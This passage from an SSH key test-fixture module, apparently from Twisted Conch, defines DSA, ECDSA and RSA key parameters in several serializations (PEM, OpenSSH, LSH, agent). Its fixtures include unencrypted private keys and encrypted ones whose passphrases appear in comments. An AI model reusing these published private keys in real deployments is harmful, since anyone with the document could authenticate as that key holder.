'q': long(1393384845225358996250882900535419012502712821577),
'x': long(1220877188542930584999385210465204342686893855021),
'y': long("14604423062661947579790240720337570315008549983452208015"
"39426429789435409684914513123700756086453120500041882809"
"10283610277194188071619191739512379408443695946763554493"
"86398594314468629823767964702559709430618263927529765769"
"10270265745700231533660131769648708944711006508965764877"
"684264272082256183140297951")
}
ECDatanistp256 = {
'x': long('762825130203920963171185031449647317742997734817505505433829043'
'45687059013883'),
'y': long('815431978646028526322656647694416475343443758943143196810611371'
'59310646683104'),
'privateValue': long('3463874347721034170096400845565569825355565567882605'
'9678074967909361042656500'),
'curve': b'ecdsa-sha2-nistp256'
}
ECDatanistp384 = {
'privateValue': long('280814107134858470598753916394807521398239633534281633982576099083'
'35787109896602102090002196616273211495718603965098'),
'x': long('10036914308591746758780165503819213553101287571902957054148542'
'504671046744460374996612408381962208627004841444205030'),
'y': long('17337335659928075994560513699823544906448896792102247714689323'
'575406618073069185107088229463828921069465902299522926'),
'curve': b'ecdsa-sha2-nistp384'
}
ECDatanistp521 = {
'x': long('12944742826257420846659527752683763193401384271391513286022917'
'29910013082920512632908350502247952686156279140016049549948975'
'670668730618745449113644014505462'),
'y': long('10784108810271976186737587749436295782985563640368689081052886'
'16296815984553198866894145509329328086635278430266482551941240'
'591605833440825557820439734509311'),
'privateValue': long('662751235215460886290293902658128847495347691199214706697089140769'
'672273950767961331442265530524063943548846724348048614239791498442'
'5997823106818915698960565'),
'curve': b'ecdsa-sha2-nistp521'
}
privateECDSA_openssh521 = b"""-----BEGIN EC PRIVATE KEY-----
MIHcAgEBBEIAjn0lSVF6QweS4bjOGP9RHwqxUiTastSE0MVuLtFvkxygZqQ712oZ
ewMvqKkxthMQgxzSpGtRBcmkL7RqZ94+18qgBwYFK4EEACOhgYkDgYYABAFpX/6B
mxxglwD+VpEvw0hcyxVzLxNnMGzxZGF7xmNj8nlF7M+TQctdlR2Xv/J+AgIeVGmB
j2p84bkV9jBzrUNJEACsJjttZw8NbUrhxjkLT/3rMNtuwjE4vLja0P7DMTE0EV8X
f09ETdku/z/1tOSSrSvRwmUcM9nQUJtHHAZlr5Q0fw==
-----END EC PRIVATE KEY-----"""
publicECDSA_openssh521 = (b"ecdsa-sha2-nistp521 AAAAE2VjZHNhLXNoYTItbmlzdHA"
b"1MjEAAAAIbmlzdHA1MjEAAACFBAFpX/6BmxxglwD+VpEvw0hcyxVzLxNnMGzxZGF7xmNj8nlF7"
b"M+TQctdlR2Xv/J+AgIeVGmBj2p84bkV9jBzrUNJEACsJjttZw8NbUrhxjkLT/3rMNtuwjE4vLja"
b"0P7DMTE0EV8Xf09ETdku/z/1tOSSrSvRwmUcM9nQUJtHHAZlr5Q0fw== comment")
privateECDSA_openssh384 = b"""-----BEGIN EC PRIVATE KEY-----
MIGkAgEBBDAtAi7I8j73WCX20qUM5hhHwHuFzYWYYILs2Sh8UZ+awNkARZ/Fu2LU
LLl5RtOQpbWgBwYFK4EEACKhZANiAATU17sA9P5FRwSknKcFsjjsk0+E3CeXPYX0
Tk/M0HK3PpWQWgrO8JdRHP9eFE9O/23P8BumwFt7F/AvPlCzVd35VfraFT0o4cCW
G0RqpQ+np31aKmeJshkcYALEchnU+tQ=
-----END EC PRIVATE KEY-----"""
publicECDSA_openssh384 = (b"ecdsa-sha2-nistp384 AAAAE2VjZHNhLXNoYTItbmlzdHAzOD"
b"QAAAAIbmlzdHAzODQAAABhBNTXuwD0/kVHBKScpwWyOOyTT4TcJ5c9hfROT8zQcrc+lZBaCs7wl"
b"1Ec/14UT07/bc/wG6bAW3sX8C8+ULNV3flV+toVPSjhwJYbRGqlD6enfVoqZ4myGRxgAsRyGdT61A== comment")
publicECDSA_openssh = (b"ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAA"
b"AAIbmlzdHAyNTYAAABBBKimX1DZ7+Qj0SpfePMbo1pb6yGkAb5l7duC1l855yD7tEfQfqk7bc7v"
b"46We1hLMyz6ObUBYgkN/34n42F4vpeA= comment")
privateECDSA_openssh = b"""-----BEGIN EC PRIVATE KEY-----
MHcCAQEEIEyU1YOT2JxxofwbJXIjGftdNcJK55aQdNrhIt2xYQz0oAoGCCqGSM49
AwEHoUQDQgAEqKZfUNnv5CPRKl948xujWlvrIaQBvmXt24LWXznnIPu0R9B+qTtt
zu/jpZ7WEszLPo5tQFiCQ3/fifjYXi+l4A==
-----END EC PRIVATE KEY-----"""
publicRSA_openssh = (b"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDVaqx4I9bWG+wloV"
b"DEd2NQhEUBVUIUKirg0GDu1OmjrUr6OQZehFV1XwA2v2+qKj+DJjfBaS5b/fDz0n3WmM06QHjVy"
b"qgYwBGTJAkMgUyP95ztExZqpATpSXfD5FVks3loniwI66zoBC0hdwWnju9TMA2l5bs9auIJNm/9"
b"NNN9b0b/h9qpKSeq/631heY+Grh6HUqx6sBa9zDfH8Kk5O8/kUmWQNUZdy03w17snaY6RKXCpCn"
b"d1bqcPUWzxiwYZNW6Pd+rf81CrKfxGAugWBViC6QqbkPD5ASfNaNHjkbtM6Vlvbw7KW4CC1ffdO"
b"gTtDc1foNfICZgptyti8ZseZj3 comment")
privateRSA_openssh = b'''-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEA1WqseCPW1hvsJaFQxHdjUIRFAVVCFCoq4NBg7tTpo61K+jkG
XoRVdV8ANr9vqio/gyY3wWkuW/3w89J91pjNOkB41cqoGMARkyQJDIFMj/ec7RMW
aqQE6Ul3w+RVZLN5aJ4sCOus6AQtIXcFp47vUzANpeW7PWriCTZv/TTTfW9G/4fa
qSknqv+t9YXmPhq4eh1KserAWvcw3x/CpOTvP5FJlkDVGXctN8Ne7J2mOkSlwqQp
3dW6nD1Fs8YsGGTVuj3fq3/NQqyn8RgLoFgVYgukKm5Dw+QEnzWjR45G7TOlZb28
OyluAgtX33ToE7Q3NX6DXyAmYKbcrYvGbHmY9wIDAQABAoIBACFMCGaiKNW0+44P
chuFCQC58k438BxXS+NRf54jp+Q6mFUb6ot6mB682Lqx+YkSGGCs6MwLTglaQGq6
L5n4syRghLnOaZWa+eL8H1FNJxXbKyet77RprL59EOuGR3BztACHlRU7N/nnFOeA
u2geG+bdu3NjuWfmsid/z88wm8KY/dkYNi82LvE9gXqf4QMtR9s0UWI53U/prKiL
2dbzhMQXuXGdBghCeE27xSr0w1jNVSvtvjNfBOp75gQkY/It1z0bbNWcY0MvkoiN
Pm7aGDfYDyVniR25RjReyc7Ei+2SWjMHD9+GCPmS6dvrOAg2yc3NCgFIWzk+esrG
gKnc1DkCgYEA2XAG2OK81HiRUJTUwRuJOGxGZFpRoJoHPUiPA1HMaxKOfRqxZedx
dTngMgV1jRhMr5OxSbFmX3hietEMyuZNQ7Oc9Gt95gyY3M8hYo7VLhLeBK7XJG6D
MaIVokQ9IqliJiK5su1UCp0Ig6cHDf8ZGI7Yqx3aSJwxaBGhZm3j2B0CgYEA+0QX
i6Q2vh43Haf2YWwExKrdeD4HjB4zAq4DFIeDeuWefQhnqPKqvxJwz3Kpp8cLHYjV
IP2cY8pHMFVOi8TP9H8WpJISdKEJwsRunIwz76Xl9+ArrU9cEaoahDdb/Xrqw818
sMjkH1Rjtcev3/QJp/zHJfxc6ZHXksWYHlbTsSMCgYBRr+mSn5QLSoRlPpSzO5IQ
tXS4jMnvyQ4BMvovaBKhAyauz1FoFEwmmyikAjMIX+GncJgBNHleUo7Ezza8H0tV
rOvBU4TH4WGoStSi/0ANgB8SqVDAKhh1lAwGmxZQqEvsQc177/dLyXUCaMSYuIaI
GFpD5wIzlyJkk4MMRSp87QKBgGlmN8ZA3SHFBPOwuD5HlHx2/C3rPzk8lcNDAVHE
Qpfz6Bakxu7s1EkQUDgE7jvN19DMzDJpkAegG1qf/jHNHjp+cR4ZlBpOTwzfX1LV
0Rdu7NectlWd244hX7wkiLb8r6vw76QssNyfhrADEriL4t0PwO4jPUpQ/i+4KUZY
v7YnAoGBAIVLG3qbEhA3nh+tXtr+xpb+3zVruTTiFpeSJgm9vXAgA6c1vS0boNIH
RyvU3qioBwcbuAQgpydBPGw5OelBzucXHdFMXLw90iYm/mrW/Uhyrkb6e8PTGWBE
HaUTp4D1YynUel0GBxZd9os9y2Q64oRaTYwGLS2dHOuDTHg9eVTO
-----END RSA PRIVATE KEY-----'''
# Some versions of OpenSSH generate these (slightly different keys): the PKCS#1
# structure is wrapped in an extra ASN.1 SEQUENCE and there's an empty SEQUENCE
# following it. It is not any standard key format and was probably a bug in
# OpenSSH at some point.
privateRSA_openssh_alternate = b"""-----BEGIN RSA PRIVATE KEY-----
MIIEqTCCBKMCAQACggEBANVqrHgj1tYb7CWhUMR3Y1CERQFVQhQqKuDQYO7U6aOtSvo5Bl6EVXVf
ADa/b6oqP4MmN8FpLlv98PPSfdaYzTpAeNXKqBjAEZMkCQyBTI/3nO0TFmqkBOlJd8PkVWSzeWie
LAjrrOgELSF3BaeO71MwDaXluz1q4gk2b/00031vRv+H2qkpJ6r/rfWF5j4auHodSrHqwFr3MN8f
wqTk7z+RSZZA1Rl3LTfDXuydpjpEpcKkKd3Vupw9RbPGLBhk1bo936t/zUKsp/EYC6BYFWILpCpu
Q8PkBJ81o0eORu0zpWW9vDspbgILV9906BO0NzV+g18gJmCm3K2Lxmx5mPcCAwEAAQKCAQAhTAhm
oijVtPuOD3IbhQkAufJON/AcV0vjUX+eI6fkOphVG+qLepgevNi6sfmJEhhgrOjMC04JWkBqui+Z
+LMkYIS5zmmVmvni/B9RTScV2ysnre+0aay+fRDrhkdwc7QAh5UVOzf55xTngLtoHhvm3btzY7ln
5rInf8/PMJvCmP3ZGDYvNi7xPYF6n+EDLUfbNFFiOd1P6ayoi9nW84TEF7lxnQYIQnhNu8Uq9MNY
zVUr7b4zXwTqe+YEJGPyLdc9G2zVnGNDL5KIjT5u2hg32A8lZ4kduUY0XsnOxIvtklozBw/fhgj5
kunb6zgINsnNzQoBSFs5PnrKxoCp3NQ5AoGBANlwBtjivNR4kVCU1MEbiThsRmRaUaCaBz1IjwNR
zGsSjn0asWXncXU54DIFdY0YTK+TsUmxZl94YnrRDMrmTUOznPRrfeYMmNzPIWKO1S4S3gSu1yRu
gzGiFaJEPSKpYiYiubLtVAqdCIOnBw3/GRiO2Ksd2kicMWgRoWZt49gdAoGBAPtEF4ukNr4eNx2n
9mFsBMSq3Xg+B4weMwKuAxSHg3rlnn0IZ6jyqr8ScM9yqafHCx2I1SD9nGPKRzBVTovEz/R/FqSS
EnShCcLEbpyMM++l5ffgK61PXBGqGoQ3W/166sPNfLDI5B9UY7XHr9/0Caf8xyX8XOmR15LFmB5W
07EjAoGAUa/pkp+UC0qEZT6UszuSELV0uIzJ78kOATL6L2gSoQMmrs9RaBRMJpsopAIzCF/hp3CY
ATR5XlKOxM82vB9LVazrwVOEx+FhqErUov9ADYAfEqlQwCoYdZQMBpsWUKhL7EHNe+/3S8l1AmjE
mLiGiBhaQ+cCM5ciZJODDEUqfO0CgYBpZjfGQN0hxQTzsLg+R5R8dvwt6z85PJXDQwFRxEKX8+gW
pMbu7NRJEFA4BO47zdfQzMwyaZAHoBtan/4xzR46fnEeGZQaTk8M319S1dEXbuzXnLZVnduOIV+8
JIi2/K+r8O+kLLDcn4awAxK4i+LdD8DuIz1KUP4vuClGWL+2JwKBgQCFSxt6mxIQN54frV7a/saW
/t81a7k04haXkiYJvb1wIAOnNb0tG6DSB0cr1N6oqAcHG7gEIKcnQTxsOTnpQc7nFx3RTFy8PdIm
Jv5q1v1Icq5G+nvD0xlgRB2lE6eA9WMp1HpdBgcWXfaLPctkOuKEWk2MBi0tnRzrg0x4PXlUzjAA
-----END RSA PRIVATE KEY-----"""
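# A minimal sanity check for the alternate serialization (a hedged sketch,
# assuming twisted.conch.ssh.keys is importable, as it is in this test suite):
# both forms should decode to the same key.
#
#     from twisted.conch.ssh.keys import Key
#     assert (Key.fromString(privateRSA_openssh) ==
#             Key.fromString(privateRSA_openssh_alternate))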
# Encrypted with the passphrase 'encrypted'
privateRSA_openssh_encrypted = b"""-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,FFFFFFFFFFFFFFFF
qRwdy/fEJQbRccoyOdhJCQv5FpsbSJWtvOTLjrURDrjpO0WvOsvwV/ltLAZtD8b3
CSlgi8eGZk+rFKNMn1uUWuVeQR3Mfn2PE2hgB0Qc0HkdfG92cnVzoRjKRQxxJM5o
F4/1MSLhwQxLF53DHWfyzK8rFNUBRyRRBFevXwPfbp6DhFy+TkqOcrLufJT7x7BC
MvMNjILVhNr9hnIMkzmAiBo9lhJ0CHdWhcQHaX7Wk6UcGNDsYrwBoLlKPQlEGMU1
2scCi1UAbCilVLyUpHFuQeCzJHBl0YuLjwmo1kSv9U5E4ysh/FIuRf3aW91OK1+y
5rPE+zJYnzNAZ/Rl9xqtvTh8hlMwjdt582HbiJb6zJw5/NEz9OKyaJjjqZsZQ1TY
GOhV0Oqwx54jpkCh0XwJ2ofmcNuiO8LoUVBE124pa6ePSxLorqBhtq9nTgwUv1Mx
lFioAM6xGBSugCRZgbapHAw0M/I8Fa95A2ocRgx0N6TMp3ZBVltovb8pZrAGld3L
T5VWGDl3ZX/eM8YlXDupewOpb56g55Aevl0jERktqJdl+g9D+PXnCsJgxMcJbfl5
tWY9KoMxV+2Fj68SHdr/acCp7xgUMwHvVLFfYCeK/hpEe9O8vOAMTlXuq9zCMDAx
kL2kcSFbZHerc4TijtjXEALo06gYHEcLRtI6lvYrzbbmpCD7J7AnMzS3SQ2FzbFM
GARKfxBnYp0dZTDiY5HE45r8xWzUupoFcIuxKtuhBEtT7H2Ynv1NmU9qQRj8C1U5
LgM3lVEkrh4o1aBIAqX0OA4do08h2pdp9v0E4HKtCjSL5EBC6xrxmIY6b6dwCDLU
n16mv4jeKGy2IKvnF9r8HXdUG0yisNGxeq5Uf7STGH5KcCRrJCBZbawAbwURaLRo
HVydDP+5uEMMVjULpYgtuNo6gw6NczOhzgYAm3v2ZMjmZ8gclOsbRrH74XiOV8kd
89oYN5yNHD2EBqP5271kbmsYZ3VwBGN+HUdWIDi3gbFfHcmy59YQt09mZIMMwD7r
nRK+AKfBnNeMK9yZkkTRs3FwY4ZJdYn58pWfe4DNqMI7U5BQ9QZnLkfGLUqWtghX
jrselJrtSEMkll+feFf7jxiCKAwC/cWe1cvukjYPA6k75Wv7RaDENfwMlZtN+pfl
pzKqId20HhMNOceaeZagL+xzM1RRj+VcXR9BWfHI2AXZPcpTGAJwDOoQA64L9YGW
7QzxHmcDTlV0e59CpAdCLj//rQxFpYnuuJlwV2YyHYnvzfxsVge7u5ApcuBpNTjf
N46Heh24xXfqfM7OcO3BB71VfcvCNQavsp70PAtj4loShX6FpzatNX0iZasB988E
TtuiJ+9e7vH0xEhBLJIUJT9LvMto25KLHFHwSQXKEXM+hiY2nfObc1Cku4lBmy+7
uWpZrh3hkmKUtfdiyeqUUj1ypwZ6boZO1UZo0xTrpubmKQEvd2957YrEEVsi0LeB
uEzSlUXrwIV7Qw2VhoLxIaCyl5j4nOKetUeAjqVNi9makh0x4Ion5osxxYvYS9s/
Y48ATMnwm3+CdN6LE3IykHyHs7JuZmawWDR4CKJB6M1r0X+Xwgs0tQ==
-----END RSA PRIVATE KEY-----"""
# Encrypted with the passphrase 'testxp'. NB: this key was generated by
# OpenSSH, so it doesn't use the same key data as the other keys here.
privateRSA_openssh_encrypted_aes = b"""-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,0673309A6ACCAB4B77DEE1C1E536AC26
4Ed/a9OgJWHJsne7yOGWeWMzHYKsxuP9w1v0aYcp+puS75wvhHLiUnNwxz0KDi6n
T3YkKLBsoCWS68ApR2J9yeQ6R+EyS+UQDrO9nwqo3DB5BT3Ggt8S1wE7vjNLQD0H
g/SJnlqwsECNhh8aAx+Ag0m3ZKOZiRD5mCkcDQsZET7URSmFytDKOjhFn3u6ZFVB
sXrfpYc6TJtOQlHd/52JB6aAbjt6afSv955Z7enIi+5yEJ5y7oYQTaE5zrFMP7N5
9LbfJFlKXxEddy/DErRLxEjmC+t4svHesoJKc2jjjyNPiOoGGF3kJXea62vsjdNV
gMK5Eged3TBVIk2dv8rtJUvyFeCUtjQ1UJZIebScRR47KrbsIpCmU8I4/uHWm5hW
0mOwvdx1L/mqx/BHqVU9Dw2COhOdLbFxlFI92chkovkmNk4P48ziyVnpm7ME22sE
vfCMsyirdqB1mrL4CSM7FXONv+CgfBfeYVkYW8RfJac9U1L/O+JNn7yee414O/rS
hRYw4UdWnH6Gg6niklVKWNY0ZwUZC8zgm2iqy8YCYuneS37jC+OEKP+/s6HSKuqk
2bzcl3/TcZXNSM815hnFRpz0anuyAsvwPNRyvxG2/DacJHL1f6luV4B0o6W410yf
qXQx01DLo7nuyhJqoH3UGCyyXB+/QUs0mbG2PAEn3f5dVs31JMdbt+PrxURXXjKk
4cexpUcIpqqlfpIRe3RD0sDVbH4OXsGhi2kiTfPZu7mgyFxKopRbn1KwU1qKinfY
EU9O4PoTak/tPT+5jFNhaP+HrURoi/pU8EAUNSktl7xAkHYwkN/9Cm7DeBghgf3n
8+tyCGYDsB5utPD0/Xe9yx0Qhc/kMm4xIyQDyA937dk3mUvLC9vulnAP8I+Izim0
fZ182+D1bWwykoD0997mUHG/AUChWR01V1OLwRyPv2wUtiS8VNG76Y2aqKlgqP1P
V+IvIEqR4ERvSBVFzXNF8Y6j/sVxo8+aZw+d0L1Ns/R55deErGg3B8i/2EqGd3r+
0jps9BqFHHWW87n3VyEB3jWCMj8Vi2EJIfa/7pSaViFIQn8LiBLf+zxG5LTOToK5
xkN42fReDcqi3UNfKNGnv4dsplyTR2hyx65lsj4bRKDGLKOuB1y7iB0AGb0LtcAI
dcsVlcCeUquDXtqKvRnwfIMg+ZunyjqHBhj3qgRgbXbT6zjaSdNnih569aTg0Vup
VykzZ7+n/KVcGLmvX0NesdoI7TKbq4TnEIOynuG5Sf+2GpARO5bjcWKSZeN/Ybgk
gccf8Cqf6XWqiwlWd0B7BR3SymeHIaSymC45wmbgdstrbk7Ppa2Tp9AZku8M2Y7c
8mY9b+onK075/ypiwBm4L4GRNTFLnoNQJXx0OSl4FNRWsn6ztbD+jZhu8Seu10Jw
SEJVJ+gmTKdRLYORJKyqhDet6g7kAxs4EoJ25WsOnX5nNr00rit+NkMPA7xbJT+7
CfI51GQLw7pUPeO2WNt6yZO/YkzZrqvTj5FEwybkUyBv7L0gkqu9wjfDdUw0fVHE
xEm4DxjEoaIp8dW/JOzXQ2EF+WaSOgdYsw3Ac+rnnjnNptCdOEDGP6QBkt+oXj4P
-----END RSA PRIVATE KEY-----"""
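# Usage sketch for the encrypted fixtures above (hedged; it assumes
# twisted.conch.ssh.keys is importable and that Key.fromString accepts a
# passphrase keyword, as it does in current Twisted):
#
#     from twisted.conch.ssh.keys import Key
#     Key.fromString(privateRSA_openssh_encrypted, passphrase=b'encrypted')
#     Key.fromString(privateRSA_openssh_encrypted_aes, passphrase=b'testxp')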
publicRSA_lsh = (
b'{KDEwOnB1YmxpYy1rZXkoMTQ6cnNhLXBrY3MxLXNoYTEoMTpuMjU3OgDVaqx4I9bWG+wloVD'
b'Ed2NQhEUBVUIUKirg0GDu1OmjrUr6OQZehFV1XwA2v2+qKj+DJjfBaS5b/fDz0n3WmM06QHj'
b'VyqgYwBGTJAkMgUyP95ztExZqpATpSXfD5FVks3loniwI66zoBC0hdwWnju9TMA2l5bs9auI'
b'JNm/9NNN9b0b/h9qpKSeq/631heY+Grh6HUqx6sBa9zDfH8Kk5O8/kUmWQNUZdy03w17snaY'
b'6RKXCpCnd1bqcPUWzxiwYZNW6Pd+rf81CrKfxGAugWBViC6QqbkPD5ASfNaNHjkbtM6Vlvbw'
b'7KW4CC1ffdOgTtDc1foNfICZgptyti8ZseZj3KSgxOmUzOgEAASkpKQ==}'
)
privateRSA_lsh = (
b"(11:private-key(9:rsa-pkcs1(1:n257:\x00\xd5j\xacx#\xd6\xd6\x1b\xec%\xa1P"
b"\xc4wcP\x84E\x01UB\x14**\xe0\xd0`\xee\xd4\xe9\xa3\xadJ\xfa9\x06^\x84Uu_"
b"\x006\xbfo\xaa*?\x83&7\xc1i.[\xfd\xf0\xf3\xd2}\xd6\x98\xcd:@x\xd5\xca"
b"\xa8\x18\xc0\x11\x93$\t\x0c\x81L\x8f\xf7\x9c\xed\x13\x16j\xa4\x04\xe9Iw"
b"\xc3\xe4Ud\xb3yh\x9e,\x08\xeb\xac\xe8\x04-!w\x05\xa7\x8e\xefS0\r\xa5\xe5"
b"\xbb=j\xe2\t6o\xfd4\xd3}oF\xff\x87\xda\xa9)'\xaa\xff\xad\xf5\x85\xe6>"
b"\x1a\xb8z\x1dJ\xb1\xea\xc0Z\xf70\xdf\x1f\xc2\xa4\xe4\xef?\x91I\x96@\xd5"
b"\x19w-7\xc3^\xec\x9d\xa6:D\xa5\xc2\xa4)\xdd\xd5\xba\x9c=E\xb3\xc6,\x18d"
b"\xd5\xba=\xdf\xab\x7f\xcdB\xac\xa7\xf1\x18\x0b\xa0X\x15b\x0b\xa4*nC\xc3"
b"\xe4\x04\x9f5\xa3G\x8eF\xed3\xa5e\xbd\xbc;)n\x02\x0bW\xdft\xe8\x13\xb475"
b"~\x83_ &`\xa6\xdc\xad\x8b\xc6ly\x98\xf7)(1:e3:\x01\x00\x01)(1:d256:!L"
b"\x08f\xa2(\xd5\xb4\xfb\x8e\x0fr\x1b\x85\t\x00\xb9\xf2N7\xf0\x1cWK\xe3Q"
b"\x7f\x9e#\xa7\xe4:\x98U\x1b\xea\x8bz\x98\x1e\xbc\xd8\xba\xb1\xf9\x89\x12"
b"\x18`\xac\xe8\xcc\x0bN\tZ@j\xba/\x99\xf8\xb3$`\x84\xb9\xcei\x95\x9a\xf9"
b"\xe2\xfc\x1fQM'\x15\xdb+'\xad\xef\xb4i\xac\xbe}\x10\xeb\x86Gps\xb4\x00"
b"\x87\x95\x15;7\xf9\xe7\x14\xe7\x80\xbbh\x1e\x1b\xe6\xdd\xbbsc\xb9g\xe6"
b"\xb2'\x7f\xcf\xcf0\x9b\xc2\x98\xfd\xd9\x186/6.\xf1=\x81z\x9f\xe1\x03-G"
b"\xdb4Qb9\xddO\xe9\xac\xa8\x8b\xd9\xd6\xf3\x84\xc4\x17\xb9q\x9d\x06\x08Bx"
b"M\xbb\xc5*\xf4\xc3X\xcdU+\xed\xbe3_\x04\xea{\xe6\x04$c\xf2-\xd7=\x1bl"
b"\xd5\x9ccC/\x92\x88\x8d>n\xda\x187\xd8\x0f%g\x89\x1d\xb9F4^\xc9\xce\xc4"
b"\x8b\xed\x92Z3\x07\x0f\xdf\x86\x08\xf9\x92\xe9\xdb\xeb8\x086\xc9\xcd\xcd"
b"\n\x01H[9>z\xca\xc6\x80\xa9\xdc\xd49)(1:p129:\x00\xfbD\x17\x8b\xa46\xbe"
b"\x1e7\x1d\xa7\xf6al\x04\xc4\xaa\xddx>\x07\x8c\x1e3\x02\xae\x03\x14\x87"
b"\x83z\xe5\x9e}\x08g\xa8\xf2\xaa\xbf\x12p\xcfr\xa9\xa7\xc7\x0b\x1d\x88"
b"\xd5 \xfd\x9cc\xcaG0UN\x8b\xc4\xcf\xf4\x7f\x16\xa4\x92\x12t\xa1\t\xc2"
b"\xc4n\x9c\x8c3\xef\xa5\xe5\xf7\xe0+\xadO\\\x11\xaa\x1a\x847[\xfdz\xea"
b"\xc3\xcd|\xb0\xc8\xe4\x1fTc\xb5\xc7\xaf\xdf\xf4\t\xa7\xfc\xc7%\xfc\\\xe9"
b"\x91\xd7\x92\xc5\x98\x1eV\xd3\xb1#)(1:q129:\x00\xd9p\x06\xd8\xe2\xbc\xd4"
b"x\x91P\x94\xd4\xc1\x1b\x898lFdZQ\xa0\x9a\x07=H\x8f\x03Q\xcck\x12\x8e}"
b"\x1a\xb1e\xe7qu9\xe02\x05u\x8d\x18L\xaf\x93\xb1I\xb1f_xbz\xd1\x0c\xca"
b"\xe6MC\xb3\x9c\xf4k}\xe6\x0c\x98\xdc\xcf!b\x8e\xd5.\x12\xde\x04\xae\xd7$"
b"n\x831\xa2\x15\xa2D=\"\xa9b&\"\xb9\xb2\xedT\n\x9d\x08\x83\xa7\x07\r\xff"
b"\x19\x18\x8e\xd8\xab\x1d\xdaH\x9c1h\x11\xa1fm\xe3\xd8\x1d)(1:a128:if7"
b"\xc6@\xdd!\xc5\x04\xf3\xb0\xb8>G\x94|v\xfc-\xeb?9<\x95\xc3C\x01Q\xc4B"
b"\x97\xf3\xe8\x16\xa4\xc6\xee\xec\xd4I\x10P8\x04\xee;\xcd\xd7\xd0\xcc\xcc"
b"2i\x90\x07\xa0\x1bZ\x9f\xfe1\xcd\x1e:~q\x1e\x19\x94\x1aNO\x0c\xdf_R\xd5"
b"\xd1\x17n\xec\xd7\x9c\xb6U\x9d\xdb\x8e!_\xbc$\x88\xb6\xfc\xaf\xab\xf0"
b"\xef\xa4,\xb0\xdc\x9f\x86\xb0\x03\x12\xb8\x8b\xe2\xdd\x0f\xc0\xee#=JP"
b"\xfe/\xb8)FX\xbf\xb6')(1:b128:Q\xaf\xe9\x92\x9f\x94\x0bJ\x84e>\x94\xb3;"
b"\x92\x10\xb5t\xb8\x8c\xc9\xef\xc9\x0e\x012\xfa/h\x12\xa1\x03&\xae\xcfQh"
b"\x14L&\x9b(\xa4\x023\x08_\xe1\xa7p\x98\x014y^R\x8e\xc4\xcf6\xbc\x1fKU"
b"\xac\xeb\xc1S\x84\xc7\xe1a\xa8J\xd4\xa2\xff@\r\x80\x1f\x12\xa9P\xc0*\x18"
b"u\x94\x0c\x06\x9b\x16P\xa8K\xecA\xcd{\xef\xf7K\xc9u\x02h\xc4\x98\xb8\x86"
b"\x88\x18ZC\xe7\x023\x97\"d\x93\x83\x0cE*|\xed)(1:c129:\x00\x85K\x1bz\x9b"
b"\x12\x107\x9e\x1f\xad^\xda\xfe\xc6\x96\xfe\xdf5k\xb94\xe2\x16\x97\x92&\t"
b"\xbd\xbdp \x03\xa75\xbd-\x1b\xa0\xd2\x07G+\xd4\xde\xa8\xa8\x07\x07\x1b"
b"\xb8\x04 \xa7'A<l99\xe9A\xce\xe7\x17\x1d\xd1L\\\xbc=\xd2&&\xfej\xd6\xfd"
b"Hr\xaeF\xfa{\xc3\xd3\x19`D\x1d\xa5\x13\xa7\x80\xf5c)\xd4z]\x06\x07\x16]"
b"\xf6\x8b=\xcbd:\xe2\x84ZM\x8c\x06--\x9d\x1c\xeb\x83Lx=yT\xce)))"
)
privateRSA_agentv3 = (
b"\x00\x00\x00\x07ssh-rsa\x00\x00\x00\x03\x01\x00\x01\x00\x00\x01\x00!L"
b"\x08f\xa2(\xd5\xb4\xfb\x8e\x0fr\x1b\x85\t\x00\xb9\xf2N7\xf0\x1cWK\xe3Q"
b"\x7f\x9e#\xa7\xe4:\x98U\x1b\xea\x8bz\x98\x1e\xbc\xd8\xba\xb1\xf9\x89\x12"
b"\x18`\xac\xe8\xcc\x0bN\tZ@j\xba/\x99\xf8\xb3$`\x84\xb9\xcei\x95\x9a\xf9"
b"\xe2\xfc\x1fQM'\x15\xdb+'\xad\xef\xb4i\xac\xbe}\x10\xeb\x86Gps\xb4\x00"
b"\x87\x95\x15;7\xf9\xe7\x14\xe7\x80\xbbh\x1e\x1b\xe6\xdd\xbbsc\xb9g\xe6"
b"\xb2'\x7f\xcf\xcf0\x9b\xc2\x98\xfd\xd9\x186/6.\xf1=\x81z\x9f\xe1\x03-G"
b"\xdb4Qb9\xddO\xe9\xac\xa8\x8b\xd9\xd6\xf3\x84\xc4\x17\xb9q\x9d\x06\x08Bx"
b"M\xbb\xc5*\xf4\xc3X\xcdU+\xed\xbe3_\x04\xea{\xe6\x04$c\xf2-\xd7=\x1bl"
b"\xd5\x9ccC/\x92\x88\x8d>n\xda\x187\xd8\x0f%g\x89\x1d\xb9F4^\xc9\xce\xc4"
b"\x8b\xed\x92Z3\x07\x0f\xdf\x86\x08\xf9\x92\xe9\xdb\xeb8\x086\xc9\xcd\xcd"
b"\n\x01H[9>z\xca\xc6\x80\xa9\xdc\xd49\x00\x00\x01\x01\x00\xd5j\xacx#\xd6"
b"\xd6\x1b\xec%\xa1P\xc4wcP\x84E\x01UB\x14**\xe0\xd0`\xee\xd4\xe9\xa3\xadJ"
b"\xfa9\x06^\x84Uu_\x006\xbfo\xaa*?\x83&7\xc1i.[\xfd\xf0\xf3\xd2}\xd6\x98"
b"\xcd:@x\xd5\xca\xa8\x18\xc0\x11\x93$\t\x0c\x81L\x8f\xf7\x9c\xed\x13\x16j"
b"\xa4\x04\xe9Iw\xc3\xe4Ud\xb3yh\x9e,\x08\xeb\xac\xe8\x04-!w\x05\xa7\x8e"
b"\xefS0\r\xa5\xe5\xbb=j\xe2\t6o\xfd4\xd3}oF\xff\x87\xda\xa9)'\xaa\xff\xad"
b"\xf5\x85\xe6>\x1a\xb8z\x1dJ\xb1\xea\xc0Z\xf70\xdf\x1f\xc2\xa4\xe4\xef?"
b"\x91I\x96@\xd5\x19w-7\xc3^\xec\x9d\xa6:D\xa5\xc2\xa4)\xdd\xd5\xba\x9c=E"
b"\xb3\xc6,\x18d\xd5\xba=\xdf\xab\x7f\xcdB\xac\xa7\xf1\x18\x0b\xa0X\x15b"
b"\x0b\xa4*nC\xc3\xe4\x04\x9f5\xa3G\x8eF\xed3\xa5e\xbd\xbc;)n\x02\x0bW\xdf"
b"t\xe8\x13\xb475~\x83_ &`\xa6\xdc\xad\x8b\xc6ly\x98\xf7\x00\x00\x00\x81"
